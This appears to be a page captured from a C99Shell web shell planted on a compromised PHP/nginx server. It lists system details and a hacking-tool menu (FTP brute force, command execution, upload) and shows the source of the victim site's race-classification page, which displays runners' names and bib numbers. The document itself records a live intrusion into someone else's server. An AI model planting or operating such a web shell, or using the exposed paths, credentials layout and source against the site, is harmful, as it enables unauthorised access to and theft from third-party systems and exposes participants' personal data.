!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/home/matadin2017/Robles2017/   drwxrwxr-x
Free 83.39 GB of 96.73 GB (86.21%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     VisorDorsal.php (7.33 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
//echo 'hola';die();
include('class.MySqliDB.php');
include(
'globals.php');
$Debug1;
$ConnectionArray= array('Server'=>Server,
                        
'Usser'=>User,
                        
'Pass'=>Pass,
                        
'Db'=>Db);
$ConnMysql= new MysqliDB($ConnectionArray);
$Sql= ("SET NAMES UTF8");
$ConnMysql->EnviarQuery($Sql);
$Sql'';
$Title'';
$Sql'';
$Sql"SELECT `HoraComienzo` FROM `".Db."`.`horacomienzo` WHERE `Carrera`='LARGA'";
$ConnMysql->EnviarQuery($Sql);
$ConnMysql->ResultadoObjetoU();
$HoraInicio$ConnMysql->ArrayResultado->HoraComienzo;

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <meta charset="UTF-8" />
    <title>Clasificaci&oacute;n General</title>
    <link rel="stylesheet" href="../css/style.css" type="text/css" media="screen" />
    <link rel="shortcut icon" href="../favicon.ico">

    
</head>
<body>
    <script type="text/javascript">      
        var contador = function(tiempo, intervalo)
            {
            var enCurso = 0, intv = intervalo || 1000;
            var veces = tiempo / intv, este = this, timer;
            this.empezar = function(callback)
                {
                enCurso = 1;
                timer = setTimeout(function()
                    {
                    if(veces + 1 && enCurso)
                        {
                        callback(veces-- * intv);
                        setTimeout(function(){ este.empezar(callback); }, intv);
                        }
                    else
                        {
                        return enCurso = 0;
                        }
                    }, intv);
                };
            this.parar = function()
                {
                if(enCurso)
                    {
                    enCurso = 0;
                    }
                };
            }
        var cuentaAtras = new contador(<?php echo TimeCarrusel;?>);
        document.body.onload = function()
            {
            cuentaAtras.empezar(function(tiempo)
                {
                document.getElementById('cuenta').innerHTML = 'Femenina Senior 28 Km en '+ tiempo / 1000 ;
                if(!tiempo)
                    {
                    window.location.href = 'CL_FemeninaSenior.php'; 
                    }
        /*document.getElementById('botonparar').onclick = function()
        {
        cuentaAtras.parar();
        document.getElementById('vinculo').innerHTML += "<a href='ClasificacionGeneralCortaH.php'>SALTAR ESTA PAGINA</a>";
        };*/
                });
            }
    </script>

    <div id="Logo" style="margin-left:20px;">
        <img src="../css/Escudo.png" width="36" height="63" /><span class="Logo"><?php echo VarTitle;?></span>
        <div id="Segundero" class="Segundero" style="float:right"><span class="Segundero" id="cuenta"></span></div>
    </div>
    
    <div id="Contenedor" class="Contenedor">
<?php
$Sql
=     "SELECT I.`Dorsal`,I.`Nombre`,I.`Apellidos`,I.`EDAD`,I.`CATEGORIA`,C.`CRONO`,TIMEDIFF(C.`CRONO`,'".$HoraInicio."') AS Tiempo
        FROM `"
.Db."`.`carreralargadefinitiva` I LEFT JOIN `".Db."`.`cronometraje` C ON I.`Dorsal`= C.`DORSAL`
        WHERE I.`CATEGORIA`= 'Masculina Senior' AND C.`CRONO` IS NOT NULL ORDER BY C.`CRONO`"
;
$ConnMysql->EnviarQuery($Sql);//print_r($ConnMysql);
$ConnMysql->ResultadoObjeto();
//echo "<pre>";print_r($ConnMysql->ArrayResultado);die();

$Title'Clasificacion Masculina Senior Carrera 28 Km';    
if(
$ConnMysql->MySqliResult->num_rows != 0)
    {    
    
$ArrayResultarray_chunk($ConnMysql->ArrayResultado,ceil($ConnMysql->MySqliResult->num_rows 3));    ?>
    <!--br /-->
    <span class="Titulo"><?php echo $Title;?></span>
    
    <br />
    <span class="Texto15 Negrita left10">INICIO DE LA CARRERA: <?php echo $HoraInicio;?></span>
    <table style="margin-left:10px;" width="100%">
        <tr>
            <td valign="top">
                <table style="margin-left:10px;" width="95%">
                    <tr>
                        <th class="TEncabezado">Orden<br />Llegada</th>
                        <th class="TEncabezado">Dorsal</th>
                        <th class="TEncabezado">Nombre</th>
                        <th class="TEncabezado">Apellidos</th>
                        <!--th class="TEncabezado">Sexo</th>
                        <th class="TEncabezado">Edad</th>
                        <!--th class="TEncabezado">Categoria</th>
                        <th class="TEncabezado">FxFinalizacion</th-->
                        <th class="TEncabezado">Crono</th>
                    </tr>        
            <?php    
                $i
1;
                foreach(
$ArrayResult[0] as $FDatos)
                    {
                    if(
$i%2)echo '<tr class="TImpar">';else     echo '<tr class="TPar">';
                    echo 
sprintf("<td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td></tr>",
                                
$i,$FDatos->Dorsal,$FDatos->Nombre,$FDatos->Apellidos,$FDatos->Tiempo);//$FDatos->EDAD,$FDatos->CATEGORIA,$FDatos->CRONO,
                    
$i++;
                    }
                unset(
$FDatos);
            
?>    </table>
            </td>
            <td valign="top">
                <table style="margin-left:10px;" width="95%">
                    <tr>
                        <th class="TEncabezado">Orden<br />Llegada</th>
                        <th class="TEncabezado">Dorsal</th>
                        <th class="TEncabezado">Nombre</th>
                        <th class="TEncabezado">Apellidos</th>
                        <!--th class="TEncabezado">Sexo</th>
                        <th class="TEncabezado">Edad</th>
                        <!--th class="TEncabezado">Categoria</th>
                        <th class="TEncabezado">FxFinalizacion</th-->
                        <th class="TEncabezado">Crono</th>
                    </tr>        
            <?php    
                
//$i= 1;
                
foreach($ArrayResult[1] as $FDatos)
                    {
                    if(
$i%2)echo '<tr class="TImpar">';else     echo '<tr class="TPar">';
                    echo 
sprintf("<td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td></tr>",
                                
$i,$FDatos->Dorsal,$FDatos->Nombre,$FDatos->Apellidos,$FDatos->Tiempo);//$FDatos->EDAD,$FDatos->CATEGORIA,$FDatos->CRONO,
                    
$i++;
                    }
                unset(
$FDatos);
            
?>    </table>
            </td>
            <td valign="top">
                <table style="margin-left:10px;" width="95%">
                    <tr>
                        <th class="TEncabezado">Orden<br />Llegada</th>
                        <th class="TEncabezado">Dorsal</th>
                        <th class="TEncabezado">Nombre</th>
                        <th class="TEncabezado">Apellidos</th>
                        <!--th class="TEncabezado">Sexo</th>
                        <th class="TEncabezado">Edad</th>
                        <!--th class="TEncabezado">Categoria</th>
                        <th class="TEncabezado">FxFinalizacion</th-->
                        <th class="TEncabezado">Crono</th>
                    </tr>        
            <?php    
                
//$i= 1;
                
foreach($ArrayResult[2] as $FDatos)
                    {
                    if(
$i%2)echo '<tr class="TImpar">';else     echo '<tr class="TPar">';
                    echo 
sprintf("<td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td></tr>",
                                
$i,$FDatos->Dorsal,$FDatos->Nombre,$FDatos->Apellidos,$FDatos->Tiempo);//$FDatos->EDAD,$FDatos->CATEGORIA,$FDatos->CRONO,
                    
$i++;
                    }
                unset(
$FDatos);
            
?>    </table>
            </td>
        </tr>
    </table>
    <?php    
    
}
else{echo 
'<span>NO HAY CORREDORES QUE HAYAN FINALIZADO</span>';}    



?>
    </div>
</body>
</html> 

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0043 ]--